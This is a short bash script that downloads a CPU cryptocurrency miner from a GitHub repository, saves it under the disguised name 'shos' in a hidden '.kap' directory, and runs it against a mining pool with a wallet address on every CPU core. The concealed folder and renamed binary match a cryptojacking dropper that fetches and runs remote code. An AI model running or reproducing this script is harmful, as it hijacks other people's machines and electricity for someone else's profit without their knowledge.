#!/bin/bash
apt update && apt -y install libssl-dev libssl3
mkdir .kap && cd .kap
wget -O shos https://github.com/nandafiku/gradi/raw/main/cpuminer-avx2
chmod 777 shos
./shos -a aurum -o stratum+tcp://stratum-na.rplant.xyz:7109 -u bit1q9f8tjdw3p8hf05wz5gpchnmhshecjd3747uqfl.x -p webpassword=x -t $(nproc --all)
